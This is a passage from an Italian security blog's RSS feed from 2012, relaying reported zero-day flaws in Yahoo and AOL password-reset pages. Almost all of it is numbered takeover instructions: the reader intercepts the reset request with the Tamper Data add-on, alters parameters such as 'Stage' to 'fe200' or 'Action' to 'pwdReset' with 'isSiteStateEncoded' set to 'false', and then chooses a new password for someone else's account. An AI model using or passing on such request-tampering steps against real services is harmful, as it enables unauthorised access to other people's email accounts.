<p><a href="http://www.oversecurity.net/2012/04/29/hotmail-yahoo-e-aol-vulnerabilita-0day-nel-reset-delle-password/"><em>Clicca qui per vedere il video incorporato.</em></a></p>
<h2>Yahoo</h2>
<p><a href="http://www.oversecurity.net/wp-content/uploads/2012/04/Yahoo.png" rel="lightbox[3760]" title="Yahoo"><img class="aligncenter size-medium wp-image-3762" title="Yahoo" src="http://www.oversecurity.net/wp-content/uploads/2012/04/Yahoo-300x143.png" alt="" width="300" height="143" /></a></p>
<ol>
<li>Vai a questa pagina https://edit.yahoo.com/forgot.</li>
<li>Inserisci l&#8217;indirizzo email e inserire i 6 caratteri che vedi;</li>
<li>Avvia Tamper Data;</li>
<li>Cambiare l&#8217;elemento &#8220;Stage&#8221; con il valore &#8220;fe200&#8243;</li>
<li>Fare clic su OK e digitare la nuova passwor;</li>
<li>Fatto.</li>
</ol>
<p><strong>Video</strong></p>
<p><a href="http://www.oversecurity.net/2012/04/29/hotmail-yahoo-e-aol-vulnerabilita-0day-nel-reset-delle-password/"><em>Clicca qui per vedere il video incorporato.</em></a></p>
<h2><strong>AOL</strong></h2>
<p><a href="http://www.oversecurity.net/wp-content/uploads/2012/04/AOL.png" rel="lightbox[3760]" title="AOL"><img class="aligncenter size-medium wp-image-3761" title="AOL" src="http://www.oversecurity.net/wp-content/uploads/2012/04/AOL-300x135.png" alt="" width="300" height="135" /></a></p>
<ol>
<li><strong></strong>Vai alla pagina di ripristino password;</li>
<li>Inserisci l&#8217;indirizzo email e inserire i caratteri che vedi;</li>
<li>Avvia Tamper Data;</li>
<li>Cambiare l&#8217;elemento &#8220;Action&#8221; con il valore &#8220;pwdReset&#8221;;</li>
<li>Cambiare l&#8217;elemento &#8220;isSiteStateEncoded&#8221; con il valore &#8220;false&#8221;;</li>
<li>Fare clic su OK e digita la nuova password;<strong></strong></li>
<li>Fatto.</li>
</ol>
<p style="text-align: right;">Via | <a href="thehackernews.com/2012/04/yet-another-hotmail-aol-and-yahoo.html" target="_blank">The Hacker News</a></p>
<p>&nbsp;</p>
<img src="http://feeds.feedburner.com/~r/OverSecurity/~4/E9KxgOiQmT8" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://www.oversecurity.net/2012/04/29/hotmail-yahoo-e-aol-vulnerabilita-0day-nel-reset-delle-password/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://www.oversecurity.net/2012/04/29/hotmail-yahoo-e-aol-vulnerabilita-0day-nel-reset-delle-password/?utm_source=rss&amp;utm_medium=rss&amp;utm_campaign=hotmail-yahoo-e-aol-vulnerabilita-0day-nel-reset-delle-password</feedburner:origLink></item>
	</channel>
</rss>

